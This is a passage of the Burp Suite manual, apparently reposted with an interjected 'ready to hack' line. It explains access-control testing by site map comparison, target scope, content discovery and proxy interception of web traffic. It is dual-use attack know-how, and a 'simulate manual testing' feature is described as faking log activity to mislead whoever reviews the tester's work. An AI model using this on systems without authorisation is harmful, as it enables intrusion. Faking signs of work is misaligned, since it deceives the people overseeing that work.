The options for configuring how Burp matches requests in the two site maps are shown below: The default options shown will work well in most situations, and match requests based on URL file path, HTTP method and the names of parameters in the query string and message body. For some applications, you will need to modify these options to ensure that requests are correctly matched. For example, if an application uses the same base URL for various different actions, and specifies the action using the values of query string parameters, you will need to match requests on the values of these parameters as well as their names. The options for configuring how Burp compares the responses to matched requests are shown below:

Again, the default options will work in most situations. These options ignore various common HTTP headers and form fields that have ephemeral values, and also ignore whitespace-only variations in responses. The default options are designed to reduce the noise generated by inconsequential variations in responses, allowing you to focus attention on differences that are more likely to matter.

The results of a simple site map comparison are shown below. This shows an application that has been mapped out with administrative privileges, and the resulting site map re-requested with user-level privileges. The results contain a colourised analysis of the differences between the site maps, and show items that have been added, deleted or modified between the two maps. (In this case, since the whole of the first site map was re-requested, there are no added or deleted items in the maps themselves.) For modified items, the table includes a “diff count” column, which is the number of edits required to modify the item in the first map into the item in the second map. When you select an item, the corresponding item in the other site map is also selected, and each response is highlighted to show the locations of the differences:

Interpreting the results of the site map comparison requires human intelligence, and an understanding of the meaning and context of specific application functions. For example, the screenshot above shows the responses that are returned to each user when they view their home page. The two responses show a different description of the logged-in user, and the administrative user has an additional menu item. These differences are to be expected, and they are neutral as to the effectiveness of the application’s access controls, since they only concern the user interface.

The screenshot below shows the response returned when each user requests the top- level admin page. Here, the administrative user sees a menu of available options, while the ordinary user sees a “not authorised” message. These differences indicate that access controls are being correctly applied:

The screenshot below shows the response returned when each user requests the “list users” admin function. Here, the responses are identical, indicating that the application is vulnerable, since the ordinary user should not have access to this function and does not have any link to it in their user interface: As this example shows, simply exploring the site map tree and looking at the number of differences between items is not sufficient to evaluate the effectiveness of an application’s access controls. Two identical responses may indicate a vulnerability (for example, in an administrative function that discloses sensitive information), or may be harmless (for example, in an unprotected search function). Conversely, two different responses may still mean that a vulnerability exists (for example, in an administrative function that returns different content each time it is accessed), or may be harmless (for example, in a page showing profile information about the currently logged-in user). All of these scenarios may coexist even in the same application. This is why fully automated tools are so ineffective at identifying access control vulnerabilities.

So Burp does not relieve you of the task of closely examining the application's functionality, and evaluating whether access controls are being properly applied in each case. What the site map comparison feature does is to automate as much of the process as possible, giving you all the information you need in a clear form, and letting you apply your knowledge of the application’s functionality to identify any actual vulnerabilities.

Target scope

The "scope" tab lets you tell Burp, at a Suite-wide level, exactly what hosts and URLs constitute the target for your current work. You can think of the target scope as, roughly, the items which you are currently interested in and willing to attack.

The target scope can affect the behaviour of the individual Burp tools in numerous ways, for example:

 You can set display filters to show only in-scope items.  You can tell the Proxy to intercept only in-scope requests and responses.  The Spider will only follow links that are in scope.  In Burp Suite Professional, you can automatically initiate vulnerability scans of in-scope items.  You can configure Intruder and Repeater to follow redirects to any in-scope URLs.

By telling Burp what your current target is, you can ensure that Burp carries out numerous such actions in an appropriate way, only going after items that you are interested in and willing to attack. In all cases, you can additionally fine tune the target scope and the associated behaviour at the level of individual tools, giving you fine- grained control over everything that Burp does, if you need it. However, the Suite-wide scope definition provides a quick and easy way to tell Burp what is fair game and what is off limits, and is almost always worth configuring before you begin your work in earnest.

The configuration of target scope is very powerful, but also very easy. The UI in the "scope" tab lets you define rules for what is included within, or excluded from, the target scope. For each rule, you can define the following fields:

 Protocol - HTTP, HTTPS, or either.  Host - this can be either a regular expression to match the hostname, or an IP range in various standard formats, for example 10.1.1.1/24 or 10.1.1-20.1-127. If the host field is left blank, then the rule can match requests to any host.  Port - this is a regular expression to match the port number. If the port field is left blank, then the rule can match requests to any port.  File - this is a regular expression to match the file portion of the URL. If the file field is left blank, then the rule can match requests for any file.

When Burp evaluates a URL to decide if it is within the target scope, it will be deemed to be in scope if the URL matches at least one "include" rule and does not match any "exclude" rules. This enables you to define specific hosts and directories as being generally within scope, and yet exclude from that scope specific subdirectories or files. For example, the target scope defined below will match any content within https://www.myapp.com and https://staging.myapp.com with the exception of content below https://www.myapp.com/admin and any URL containing the expression "logout":

Configuring scope rules directly as described above is somewhat unfriendly for many users. A much easier approach is to let Burp define the rules for you based on intuitive instructions which you give it using the context menus in the site map or elsewhere. Before you begin testing the application, you simply need to browse to the relevant content so that it appears in the site map. You can then select one or more hosts and folders, and use the context menu to include or exclude these from the scope. This process is extremely easy and in most situations will let you quickly define all of the rules necessary for your testing:

Suite options

The options tab contains Suite-wide settings which are not specific to any individual tools. These are divided into several sub-tabs containing different areas of settings.

Connections tab

This tab contains options controllling how Burp handles network connections, including authentication, proxy servers, redirections, timeouts and hostname resolution. These settings control whether Burp Suite should perform authentication to destination web servers. Different authentication types and credentials can be configured for individual hosts. Supported types are: basic, NTLMv1, NTLMv2 and digest authentication. The domain and hostname fields are only used for NTLM authentication. The "prompt for credentials" option causes an interactive popup to appear whenever an authentication failure is encountered. These settings allow you to configure rules specifying different proxy settings for different (ranges of) destination hosts.

The configuration shown above will make Burp talk directly to staging.intranet.corp.com, use an internal proxy server without authentication for everything else on *.intranet.corp.com, and use an authenticated gateway web proxy for everything else, including the public internet.

You can use standard wildcards in the destination host specification. Rules are applied in sequence, and the first rule which matches the web server you are communicating with will be used. If no rule is matched, Burp defaults to direct, non-proxy connections. For each upstream proxy you configure, you can specify an authentication type and credentials if required. Supported types are: basic, NTLMv1, NTLMv2 and digest authentication. The domain and hostname fields are only used for NTLM authentication. These options let you configure Burp to use a SOCKS proxy for all outgoing communications.

These settings control what types of redirection Burp will recognise and attempt to follow where applicable. The redirection targets which Burp will actually follow are still determined by the configuration within each individual tool (e.g. based on target scope). These settings determine timeouts for various network tasks. The "normal" setting is used for most network communications, and determines how long Burp Suite will wait before abandoning an individual request and record that a timeout has occurred. The "read until close" setting is only used where a response is being processed which does not contain a Content-Length or Transfer-Encoding HTTP header. In this situation, Burp Suite waits for the specified interval before determining that the transmission has been completed. The "domain name resolution" setting determines how often Burp Suite will re-perform successful domain name look-ups. This should be set to a suitably low value if target host addresses are frequently changing. The "failed domain name resolution" setting determines how often Burp Suite will reattempt unsuccessful domain name look- ups.

These settings enable you to specify hostname-to-IP mappings which override the DNS resolution provided by the operating system. This feature can be used to ensure correct onward forwarding of requests when the hosts file has been modified to perform invisible proxying of traffic from non-proxy-aware thick client components.

These options control the handling of HTTP 100 Continue responses from servers. These often occur when a POST request is sent to the server, and it makes an interim response before the request body has been transmitted. If "understand 100 Continue responses" is checked, Burp Suite will skip the interim response and parse the real response headers for response information like status code and content type. If "remove 100 Continue headers" is checked, Burp Suite will remove any interim headers from the server's response before this is passed to individual tools.

Sessions tab

This tab allows you to configure Burp's session handling and macro capabilities. For more information about making use of these feature, see the session handling help.

Display tab

This tab contains options controlling how Burp displays HTTP requests and responses.

These settings control the font which is used to display HTTP messages, and whether syntax highlighting is performed for requests and responses.

These settings control how Burp handles character sets when displaying HTTP requests and responses. By default, charsets are automatically recognised and correctly rendered, per response. This avoids the need to set a specific charset on the command line when starting Burp, and allows you to work with content that uses multiple different charsets within the same instance of Burp. You can override this default behaviour and set a specific charset, or tell Burp to display raw bytes with no charset handling, in the above options.

Note that some charsets are not supported for all fonts. If you are using a charset that employs non-Latin glyphs, you should first try using a system font such as Courier New or Dialog.

Any location where HTTP responses are displayed within Burp Suite it is possible to render HTML content as it would appear within your browser. This option controls whether Burp Suite will make any additional HTTP requests that are required to fully render HTML content (for example, for embedded images). Use of this option involves a trade-off between the speed and the quality of HTML rendering performed by Burp Suite.

SSL tab

This tab contains options for how SSL should be used, and information about the SSL certificates presented by destination servers.

This option enables you to configure a client SSL certificate (in PKCS12 format) which will be used whenever a destination HTTPS server requires client certificate authentication. You can also configure Burp to allow unsafe renegotiation, which is apparently necessary when using some client certificates. Sometimes, you may have difficulty negotiating SSL connections with certain web servers. The Java SSL stack contains a few gremlins, and fails to work with certain unusual server configurations. To help you troubleshoot this problem, Burp lets you specify which protocols should be offered to servers during SSL negotiations.

Note that Burp itself implements a few workarounds for SSL issues, and if a negotiation fails with the protocols you have configured, Burp will still try some alternative combinations of protocols which often work. So you shouldn't use this feature as a method of testing which protocols are actually supported by the server.

You can also configure Burp to enable all supported cipher suites during SSL negotiation. This option is not normally necessary but may be useful when attempting to connect to unusually configured SSL stacks.

This information-only panel contains details of all X509 certificates received from destination web servers. Double-click an item in the table to display the full details of the certificate. Misc tab

This tab contains miscellaneous settings regarding logging, backup, location of temporary files, and scheduled tasks.

These settings control logging of network requests and responses. Logging can be configured per-tool or for all Burp Suite traffic.

[Pro version] These settings let you configure Burp to save a backup of all tools' state and configuration in the background at a configurable interval, and also optionally on exit. This setting persists across reloads of Burp. So you can configure Burp to always save its state to a local temp directory, and know that every time you use Burp you will have a backup copy of your work. These options let you configure the directory path where Burp saves its temporary files. This allows you to specify a directory on a different volume, or which is not world- readable, if required. Changes to this setting take effect the next time Burp starts up.

[Pro version] You can use the task scheduler to automatically start and stop certain tasks at defined times and intervals. For example, the configuration shown above will begin scanning a target overnight at 2am, and suspend the scanner each day during working hours.

You can create tasks via the context menus which appear throughout Burp, or using the "new task" button in the above panel. This action starts a wizard which lets you configure the details and timing of the task. Various different types of task are available: You can configure each task to be one-off, or to repeat at regular intervals.

Engagement tools

[Pro version] A number of tools exist to help make your work faster and more effective. These can be accessed via the context menus which appear throughout Burp: Search

See search help.

Note that if you initiate a search from within the target site map (as opposed to the Burp menu), then the search will be specific to the selected branch(es) of the site map.

Find comments and scripts

You can use these functions to search part or all of the site map for scripts and comments. The search results window shows responses from all Burp tools containing either scripts or comments. Selecting an individual item shows the full request and response in a preview pane, with relevant items automatically highlighted, and also extracted into their own tab: You can use the "export" button to save all of the scripts or comments to file or to the clipboard, optionally consolidating duplicated items.

Find references

Anywhere you see an HTTP request, URL, domain, etc., you can use the "find references" function to search all of Burp's tools for HTTP responses which link to that item. The search results window shows responses from all Burp tools which link to the selected item. When you view an individual search result, the response is automatically highlighted to show where the linking reference occurs: Note that this feature treats the original URL as a prefix when searching for links, so if you select a host, you will find all references to that host; if you select a folder, you will find all references to items within that folder or deeper.

The new "find references" feature effectively serves the same purpose as the "linked from" list that existed in earlier versions of Burp Spider, but is much more powerful.

Analyse target

This function can be used to analyse a target web application and tell you how many static and dynamic URLs it contains, and how many parameters each URL takes. This can help you assess how much effort a penetration testing engagement is likely to involve, and can help you decide where to focus your attention during the test itself.

To access this feature, select one or more hosts or branches within the site map, and launch it using the context menu. The summarised information looks like this: And you can drill down into more detail about individual URLs:

You can also export all of this information as an HTML report, which you can attach to client proposals and reports to show the attack surface you have covered. Note: (i) This function only analyses the content already captured within the site map, so you should ensure that you have fully browsed or spidered all of the application's content and functionality before running it. (ii) URLs are deemed to be "static" if they no not take any parameters in the URL or message body; however the responses from these URLs may still be dynamically generated by the application.

Discover content

You can use this function to discover content and functionality which is not linked from visible content which you can browse to or spider.

Burp uses various techniques to discover content, including name guessing, web spidering, and extrapolation from naming conventions observed in use within the application. The feature is highly configurable, as shown by the available options which are explained below:

Target - These options control which directory to begin discovery from. Only items within this path and its subdirectories will be requested during the session. You can choose to discover files or directories or both, and how deep to recurse into discovered subdirectories.

Test case generation - These options control which file and directory names Burp will use when making requests to discover content. As well as built-in lists, Burp can harvest names used elsewhere within an application, and retry them at other locations, and can construct names based on discovered items, for example by cycling values in filenames containing numbers.

File extensions - You can specify a list of file extensions with which to test each possible filename. Burp can harvest file extensions observed in use within the application, and test these with every filename. When a file has been confirmed, Burp can also try a specific list of variant extensions with that filename, for example to check for old or backup versions of the same file.

Discovery engine - You can control how many threads are used for content discovery and spidering, whether file names are handled case sensitively, and how the discovery session interacts with Burp's main site map (in the target tab of the suite).

When you have configured your discovery session, you can start it from the control tab, which also provides runtime information about the actions being performed. The work is divided into numerous discrete tasks, which are prioritised according to their likelihood of quickly discovering new content, and new tasks are generated recursively as content is confirmed: The discovery session employs its own site map, showing all of the content which has been discovered within the defined scope. If you have configured Burp to do so, newly discovered items will also be added to Burp's main site map.

Schedule task

See task scheduler help.

Simulate manual testing

This feature won't exactly enhance your productivity, but you may sometimes find it useful nonetheless. You can use it to make Burp simulate manual testing activities, by sending common test payloads to random URLs and parameters within a target application, at irregular intervals. Burp doesn't do anything with the responses, so you won't find out about any bugs in this way. But if you think that someone might be reviewing the application's logs to confirm that you are working, you can use this feature while you nip out for a long lunch, gym session, drinking binge, or whatever happens to be your preferred diversion.

Easter Eggs, anyone?

Message editor

Throughout Burp, a custom text editor is used which is optimised for viewing and editing HTTP requests and responses. Request and response syntax is automatically colourised to highlight interesting items. Mouse-over pop-ups perform automatic URL decoding (for requests) and HTML decoding (for responses).

The following shortcut keys are available:

 Ctrl + A, select all  Ctrl + X, cut selected text  Ctrl + C, copy selected text  Ctrl + V, paste  Ctrl + F, find and highlight the selected text throughout the message  Ctrl + Z, undo last edit  Ctrl + Y, redo last undone edit  Ctrl + U, URL-encode selected text (hold down Shift to decode)  Ctrl + H, HTML-encode selected text (hold down Shift to decode)  Ctrl + B, Base64-encode selected text (hold down Shift to decode)  Ctrl + left, move to previous word  Ctrl + right, move to next word  Ctrl + up, move to previous paragraph  Ctrl + down, move to next paragraph  Ctrl + home, go to start of message  Ctrl + end, go to end of message  Ctrl + backspace, delete previous word  Ctrl + del, delete next word

Right-clicking on any request or response produces a context menu that can be used to perform various actions:

 send to - You can send any message, or a selected portion of the message, to other tools within Burp Suite, to perform further attacks or analysis.  show response in browser - You can use this to render the selected response in your browser, to avoid the limitations of Burp's built-in HTML renderer. When you select this option, Burp gives you a unique URL which you can paste into your browser (configured to use the current instance of Burp as its proxy), to render the response. The resulting browser request is served by Burp with the exact response that you selected (the request is not forwarded to the original web server), and yet the response is processed by the browser in the context of the originally requested URL. Hence, relative links within the response will be handled properly by your browser. As a result, your browser may make additional requests (for images, CSS, etc.) in the course of rendering the response - these will be handled by Burp in the usual way.  request in browser - You can use this to re-issue the selected request in your browser (configured to use the current instance of Burp as its proxy), and optionally re- issue the request within the current browser session (i.e. using the cookies supplied by the browser's cookie JAR). You can use this feature to facilitate testing of access controls, by selecting requests within Burp that were generated within one user context (e.g. an administrator), and reissuing the requests within a different user context that you are now logged in as (e.g. an ordinary user). When you are dealing with complex, multi-stage processes, this methodology, of manually pasting a series of URLs from Burp into your browser, is normally a lot easier than repeating a multi-stage process over and over, and modifying cookies manually using the proxy.  find references - [Pro version] You can use this function to search all of Burp's tools for HTTP responses which link to the selected item.  discover content - [Pro version] You can use this function to discover content and functionality which is not linked from visible content which you can browse to or spider.  schedule task - [Pro version] You can use this function to create tasks which will run automatically at defined times and intervals.  change request method - For requests, you can automatically switch the request method between GET and POST, with all relevant request parameters suitably relocated within the request. This option can be used to quickly test the application's tolerance of parameter location in potentially malicious requests (e.g. cross-site scripting).  change body encoding - For requests, you can switch the encoding of any message body between application/x-www-form-urlencoded and multipart/form-data.  copy URL - This function copies the full current URL to the clipboard.  copy to file - This function allows you to select a file and copy the contents of the message to the file. This is handy for binary content, when copying via the clipboard may cause problems. Copying operates on the selected text or, if nothing is selected, the whole message.  paste from file - This function allows you to select a file and paste the contents of the file into the message. This is handy for binary content, when pasting via the clipboard may cause problems. Pasting replaces the selected text or, if nothing is selected, inserts at the cursor position.  save item - This function lets you specify a file to save the selected request and response in XML format, including all relevant metadata such as response length, HTTP status code and MIME type.  convert selection - These functions enable you to perform quick encoding or decoding of the selected text in a variety of schemes.  URL-encode as you type - If this option is turned on then characters like & and = will be automatically replaced with their URL-encoded equivalents as you type.

Extensibility

Burp Suite is extensible via the IBurpExtender interface. This allows third-party developers to extend the functionality of Burp by creating implementations of the interface which will be dynamically loaded and executed. Extensions can perform a wide range of functions, including processing and modifying HTTP requests made via all Burp tools, issuing arbitrary HTTP requests via Burp, extending Burp's UI with custom menu items, querying and modifying Burp's configuration data, and accessing key runtime information, including the Proxy history, site map and Scanner issues. See the source code and Javadoc for the interface for more details.

I think if you gone through the manual you are ready to hack.But wait there are so much to offer. What is Burp Proxy?

Burp Proxy is an interactive HTTP/S proxy server for attacking and debugging web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.

Burp Proxy allows you to find and exploit application vulnerabilities by monitoring and manipulating critical parameters and other data transmitted by the application. By modifying browser requests in various malicious ways, Burp Proxy can be used to perform attacks such as SQL injection, cookie subversion, privilege escalation, session hijacking, directory traversal and buffer overflows. Intercepted traffic can be modified as raw text, as a table of parameters or headers, or in hexadecimal form, so even transfers of binary data can be manipulated. Response messages containing HTML or image data can be rendered within Burp Proxy.

In addition to per-request manipulation, Burp Proxy maintains a complete history of every request sent by the browser, all modifications made, and all responses received. You can review earlier requests, and reissue and re-modify any individual request, and view saved responses in raw form or rendered as web pages. The entire conversation in both directions can also be logged to file for further analysis or to provide an audit trail.

Burp Proxy is tightly integrated with the other tools within Burp Suite, and allows any request or response to be sent to other tools for further processing. With a single click, you can send an interesting request to be used as the basis for session token analysis, manual modification and reissue, vulnerability analysis, or a custom automated attack using Burp Intruder.

The interactive behaviour of Burp Proxy can be controlled using fine-grained rules for requests and responses, based on domain, IP address, protocol, HTTP method, URL, resource type, parameters, cookies, header/body content, response code, content type and HTML page title. It can be configured to operate quietly without any per-request interaction. You can later review the history to identify requests that bear closer examination. Burp Proxy can be used to automate modification of HTTP request and response messages, through the use of regex-based match and replace rules.

In addition to the main user interface, Burp Proxy can also be controlled from within the end browser, for reviewing the request history and reissuing individual requests. Burp Proxy can be used in conjunction with a upstream proxy server. It can handle basic, NTLM and digest authentication to the upstream proxy and to web servers, and so can be used in almost any LAN environment. It supports SSL (with the ability to configure custom server or client certificates), and allows HTTPS traffic to be viewed and modified as clear-text. In addition, it automatically handles various encodings of server responses, including chunked transfer-encoding and compressed content- encoding.

Using Burp Proxy

When Burp Proxy is launched, the HTTP/S proxy service is started automatically on port 8080 of the loopback interface only. To start using Burp Proxy, simply configure your browser to use a proxy server on 127.0.0.1:8080, and begin browsing.

By default, Burp Proxy is configured to intercept requests for non-media resources, and display these for inspection and modification. Other requests (for images and stylesheets) and all server responses are automatically forwarded. This default behaviour can be modified (seeOptions tab).

Intercept tab

This tab is used to display and modify individual browser requests and server responses.

The top of the display indicates whether the HTTP message shown is a request or response, and the hostname and IP address of the target server. When you have reviewed and (if required) edited the message, click "forward" to send it on to the server or browser. Click "drop" to abandon the message. You can also forward or drop the message using the shortcut keys Alt-F and Alt-D.

Each request and response message can be displayed and analysed in various forms, by clicking on one of the available display tabs. The available tabs will appear and disappear as appropriate for the type of message being displayed:

 raw - This displays the message in plain text form. At the bottom of the text pane is a search and highlight function which can be used to quickly locate interesting strings within the message, such as error messages. An options pop-up on the left of the search bar lets you control case sensitivity, and whether to use simple text or regex search.  params - For requests containing parameters (within the URL query string, the Cookie header, or the message body), this tab analyses the parameters into name/value pairs and allows these to be easily viewed and modified.  headers - This shows the HTTP headers of the message as name/value pairs, and also displays any message body in raw form.  hex - This allows direct editing of the raw binary data that make up the message. Certain types of traffic (e.g. browser requests with MIME-encoded parts) contain binary content that may be corrupted if modified in the text editor. To modify this type of message, the hex editor should be used.  HTML / XML - For responses containing content in these formats, this provides a syntax-colourised view of the message body.  render - For responses containing HTML or image content, this renders the content in visual form, as it would appear within your browser.  AMF - For requests and responses in Action Message Format, this displays a tree view of the decoded message. If editable, you can double-click individual nodes in the tree to modify their values.  viewstate - For requests and responses containing an ASP.NET ViewState parameter, this deserialises the contents of the ViewState, enabling you to review the data contained for any sensitive items. It also indicates whether the ViewState MAC option is enabled (and therefore whether the ViewState can be modified).

Right-clicking on any of the display tabs produces a context menu that can be used to perform various actions. The same menu can also be accessed via the "action" button on the main display:  send to - You can send any message, or a selected portion of the message, to other tools within Burp Suite, to perform further attacks or analysis.  find references - [Pro version] You can use this function to search all of Burp's tools for HTTP responses which link to the selected item.  discover content - [Pro version] You can use this function to discover content and functionality which is not linked from visible content which you can browse to or spider.  schedule task - [Pro version] You can use this function to create tasks which will run automatically at defined times and intervals.  change request method - For requests, you can automatically switch the request method between GET and POST, with all relevant request parameters suitably relocated within the request. This option can be used to quickly test the application's tolerance of parameter location in potentially malicious requests (e.g. cross-site scripting).  change body encoding - For requests, you can switch the encoding of any message body between application/x-www-form-urlencoded and multipart/form-data.  copy URL - This function copies the full current URL to the clipboard.  copy to file - This function allows you to select a file and copy the contents of the message to the file. This is handy for binary content, when copying via the clipboard may cause problems. Copying operates on the selected text or, if nothing is selected, the whole message.  paste from file - This function allows you to select a file and paste the contents of the file into the message. This is handy for binary content, when pasting via the clipboard may cause problems. Pasting replaces the selected text or, if nothing is selected, inserts at the cursor position.  save item - This function lets you specify a file to save the selected request and response in XML format, including all relevant metadata such as response length, HTTP status code and MIME type.  don't intercept - These commands allow the quick addition of interception rules (see Options tab) to prevent interception of messages which share features of the currently displayed message (e.g. remote host, resource type, response code).  do intercept - Available for requests only, this allows you to force interception for the response to the currently displayed request.  convert selection - These functions enable you to perform quick encoding or decoding of the selected text in a variety of schemes.  URL-encode as you type - If this option is turned on then characters like & and = will be automatically replaced with their URL-encoded equivalents as you type.

The intercept tab contains a toggle button which can be used to quickly turn interception mode on and off. If this is showing "intercept is on" then messages will be intercepted or automatically forwarded according to the interception rules configured on the Options tab. If this is showing "intercept is off" then no messages will be intercepted.

Options tab

This tab contains various configuration options which control the behaviour of Burp Proxy, as described below. Burp Proxy allows you to define multiple listeners. Each listener opens a port on your computer and waits for connections from your browser. By default, Burp opens a single listener on port 8080 of the loopback interface, but you can modify this listener and add as many others as you require. For each listener, you can configure a number of properties, as described below. local listener port - This is the port on the local computer which will be opened to listen for incoming connections. You should configure your browser settings to use the host 127.0.0.1 and this port as its proxy server. listen on loopback interface only - This controls whether the listener binds only to the loopback interface (127.0.0.1) or to all network interfaces. Note: if this option is deselected then other computers may be able to connect to the listener. This may enable them to initiate outbound connections originating from your IP address, and to access the contents of the proxy history, which may contain sensitive data such as login credentials. You should only deselect this option when you are located on a trusted network. support invisible proxying for non-proxy-aware clients - If you are using a standard browser, you should leave this option unchecked. The option is sometimes useful if the application you are targeting employs a thick client component which runs outside of the browser, or which makes its own HTTP requests outside of the browser's framework. Often, these clients don't support HTTP proxies, or don't provide an easy way to configure them to use one. In this situation, you can effectively force the client to connect to Burp by redirecting the client's requests lower down the networking stack - e.g. by adding an entry to your hosts file, or changing your routing configuration. However, the requests issued by the client will probably not be in the style normally used with web proxies.

A proxy-style request looks like this:

GET http://myapp.com/foo.php HTTP/1.1 Host: myapp.com whereas the corresponding non-proxy request looks like this:

GET /foo.php HTTP/1.1 Host: myapp.com

Normally, web proxies need to receive the full URL in the first line of the request in order to determine which destination host to forward the request to (they do not, if they follow the spec, look at the Host header to determine the destination). To enable Burp Proxy to work with clients that send non-proxy-style requests, you need to check the "support invisible proxying" option. When you do this, if Burp receives any non- proxy-style requests, it will by parse out the contents of the Host header, and use that as the destination host for that request. redirect to host/port - You should normally leave these options blank. If they are configured, Burp Proxy will forward every request to the host and port specified, regardless of the target requested by the browser. Note that if you are using this option, it may be necessary to configure a match/replace rule to rewrite the Host header in requests, if the server to which you are redirecting requests expects a Host header that differs from the one sent by the browser. server SSL certificate - This option lets you configure the server SSL certificates that are presented to your browser. Correct use of these options can resolve some SSL issues that arise when using an intercepting proxy. See the server SSL certificates help for full details of how to use these options.

Note: By default, upon installation, Burp creates a unique, self-signed CA certificate, and stores this on your computer to use every time Burp is run. Each time you connect to an SSL-protected website, Burp generates a server certificate for that host, signed by the CA certificate. To make most effective use of this feature, you can install Burp's CA certificate as a trusted root in your browser (see instructions), so that the per-host certificates are accepted without any alerts.

Sometimes, you may wish to create a custom SSL certificate to use within Burp. You can use the following commands in OpenSSL to create a custom certificate (called "foo.crt") with a name of your choosing: openssl genrsa 1024 > foo.key openssl req -new -x509 -nodes -sha1 -days 7300 -key foo.key > foo.crt openssl pkcs12 -export -out foo.p12 -in foo.crt -inkey foo.key -name "your name"

These panels allow fine grained interception rules to be configured governing the interception of requests and responses. The "intercept if" checkboxes control whether any requests and responses at all are intercepted. If one or both of these boxes are checked, then the relevant messages will be intercepted according to the active rules in the table. Individual rules can be activated or deactivated with the checkbox on the left of each rule. Rules can be edited, removed, added or relocated using the buttons on the right.

Rules can be configured on practically any attribute of the message, including domain name, IP address, protocol, HTTP method, URL, resource type, parameters, cookies, header/body content, response code, content type and HTML page title. You can configure rules to only intercept items for URLs that are within the target scope. Regular expressions can be used to define complex matching conditions for each attribute. Rules are combined using the Boolean operators AND and OR. These are processed with a simple "left to right" logic in which the scope of each operator is as follows:

(cumulative result of all prior rules) AND/OR (result of current rule)

All active rules are processed on every message, and the result after the final active rule is applied determines whether the message is intercepted or forwarded in the background.

The "update Content-Length" checkboxes control whether Burp Proxy automatically updates the Content-Length header of requests and responses when these have been modified by the user. If checked, Burp Proxy will recalculate the length of the HTTP body of the modified message, and set the correct value in the HTTP header. This feature is normally essential when the HTTP body has been modified. The HTTP specification, and most web servers, require the correct value for the length of the HTTP body to be submitted in the Content-Length header. If the correct value is not specified, then the server or browser receiving the message may generate an error, process an incomplete message, or may wait indefinitely for further data to be received. You can use these options to achieve various tasks by automatically rewriting the HTML in application responses. Unhiding hidden fields enables you to edit their values directly in the browser, rather than by intercepting subsequent requests. Similarly with enabling disabled fields, and removing length limitations. Disabling JavaScript and OBJECT tags provides a quick way to disable any client-side logic for testing purposes. (Note that this feature is not designed to be used as a security defence in the manner of NoScript.)

match and replace - These options configure Burp Proxy to perform regex-based pattern matching and replacement on HTTP request and response headers and body. For each rule selected, a regular expression is used to test the header or body for matches, and any matching parts are replaced with the specified string.

For message headers, if the test matches the entire header and the replacement string is left blank, then the header is deleted. If a blank matching expression is specified, then the replacement string will be added as a new header. This feature is useful to automate certain application attacks, such as manipulation of cookies or URL query string fields.

talk HTTP/1.0 to server - This controls whether Burp Proxy enforces HTTP version 1.0 communications with the target server. The default setting is to use whichever version of HTTP is used by the browser. Burp Proxy has been tested successfully with most common web servers using both versions 1.0 and 1.1. However some legacy servers or applications may require version 1.0 in order to function correctly, and so this can be specified here. unpack gzip / deflate - Some browsers accept gzip- and deflate-compressed content from servers. In order to view or modify this content, it needs to be unpacked into uncompressed form. This option controls whether Burp Proxy performs this unpacking automatically.

History tab

This tab displays details of all requests made, and shows the target server and port number, the HTTP method, the URL, whether the request contains parameters or was manually modified, the HTTP status code of the response, the response size in bytes, the MIME type of the response, the file type of the requested resource, the title of the HTML page, whether SSL was used, the remote IP address, any cookies set by the server, and the time of the request. This tab is useful when you have interception turned off, as it allows you to browse without interruption whilst still monitoring key details about application traffic.

You can click on any column heading in the history table to sort the table according to the contents of that column (or shift-click the column to reverse-sort). For example, if you prefer your history table to grow "upwards", with the most recent items at the top of the table, then you can shift-click the leftmost column showing the request number. Alternatively, if you want to group all of the requested items according the their content type, you can click the "MIME type" column.

Below the history table is a preview pane. If you select an item from the history, the relevant request and response (if received) will be displayed in the lower pane. If the request or response was modified, either manually or through any rules that you have configured, then the modified items will also be shown alongside the originals.

Right-clicking on one or more items in the history table will show a context menu enabling you to perform various actions, including modifying the target scope, sending the items to other Burp tools, or deleting the items from the history:

[Pro version] You can use the context menu to access various engagement tools, such as searching for comments and scripts, analysing your target web site, scheduling tasks, etc. You can annotate individual or multiple items, by adding comments and highlights:

You can highlight individual items using a drop-down menu on the left-most table column:

And you can comment individual items in-place by double-clicking and editing the table cell: Alternatively, if you want to annotate several items at once, you select the relevant items and use the context menu to add comments or apply highlights:

When you have annotated interesting requests, you can use column sorting and display filters to quickly find these items later. In addition to viewing request details in the preview pane, you can also double-click on any item in the table to show the request and response in a pop-up window:

The content displayed within the history table is effectively a view into an underlying database, and you can configure filters to determine which items of underlying data are displayed within the table. Some applications contain a large amount of content like images, CSS, etc., which it is normally helpful to hide from view. AJAX applications often generate large numbers of very similar asynchronous requests which you may want to filter from view to see the more interesting items. At the top of the history table, there is a filter bar. Clicking on this shows a popup enabling you to configure exactly what content will be displayed within the table: You can choose to display only requests with parameters, or which are within the current target scope, or for which a response has been received. You can filter by MIME type, HTTP status code and file extension. If you set a filter to hide some items, these are not deleted, only hidden, and will reappear if you unset the relevant filter.

[Pro version] You can also specify a search term to filter on, which will only show items containing that expression in the request or response, or within the user-added comment if applicable.

As well as filtering, you can also permanently delete items from the history, by selecting one or more items in the history table, and choosing "delete" from the context menu.

In some situations, it can be useful to display more than one view into the underlying history data, and apply different filters to each view. For example, when testing access controls, you may log into an application in different user contexts, and want to review separately the different sequences of requests that occur in each user context. You can open additional views of the proxy history by selecting the "show new history window" option from the proxy history context menu. You can then configure the display filter for each history window to show the requests that you want to see.

To use this feature to help test access controls, you need to use a separate browser for each user context you are testing, and create a separate proxy listener in Burp for use by each browser (you will need to update your proxy configuration in each browser to point to the relevant listener). For each browser, you can then open a separate proxy history window in Burp, and set the filter to show only requests from the relevant proxy listener port. As you use the application in each browser, each history window will show only the items for the associated user context: In-browser controls

In addition to the main interface, you can control Burp Proxy directly from within your browser.

The full proxy history can be accessed by visiting http://burp with your browser. The history is displayed in a table which shows the target server and port number, the HTTP method, the URL, the file extension, and whether or not the request was modified: Clicking on an entry in the "URL" column displays the original request. Clicking on an entry in the "modified?" column displays the relevant modified request. When an individual request is displayed in full, the request can be reissued by clicking the "repeat request" button. Depending on the currently configured interception rules (see Options tab), the request may be displayed within Burp Proxy for modification. When the browser receives the server's response to the re-issued request, onward browsing can continue as normal.

If available, you can also view the original response within your browser by clicking the "view response" button. This causes Burp Proxy to return the exact response originally received from the server, and neither the request nor response will be displayed within Burp Proxy for modification. Note that when the browser receives the saved response from Burp Proxy, this may cause the browser to launch additional requests (e.g. for embedded images). These new requests will be handled by Burp Proxy in the normal way, and will not be returned from any previously saved data.

Extensibility

